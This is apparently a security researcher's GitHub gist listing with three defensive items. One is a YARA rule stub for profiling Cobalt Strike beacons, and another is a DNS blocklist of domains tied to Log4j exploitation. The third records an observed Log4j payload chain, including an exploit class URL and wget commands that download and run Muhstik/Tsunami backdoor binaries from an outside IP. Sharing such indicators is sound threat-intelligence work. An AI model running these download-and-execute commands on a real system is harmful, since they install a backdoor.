Skip to content

Instantly share code, notes, and snippets.

View yt0ng's full-sized avatar

Markus Neis yt0ng

29 followers · 1 following
View GitHub Profile
@yt0ng
yt0ng / console_kungfu.yar
Created February 5, 2022 15:38
// Must have console module via yara-4.2.0-rc1+
// expects decoded beacons
import "pe"
import "console"
rule CobaltStrike_Watermark_Profiler: Profiler
{
meta:
@yt0ng
yt0ng / log4j-RPZ-list.txt
Last active January 7, 2022 12:21
RPZ for Log4j
############################################################################
# RPZ to detect internal exploitation of Log4j
############################################################################
# Joint work @craiu https://twitter.com/craiu
# https://github.com/craiu/iocs/blob/main/log4shell/log4j_blocklist.txt
############################################################################
dnspod.cn
bingsearchlib.com
interactsh.com
@yt0ng
yt0ng / gist:8a87f4328c8c6cde327406ef11e68726
Last active December 15, 2021 03:13
Log4j Payload Dropped
45.130.229.168:1389/Exploit.class
Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b
--> curl http://18.228.7.109/.log/log
log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b
--> Download of Muhstik/Tsunami Backdoor
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &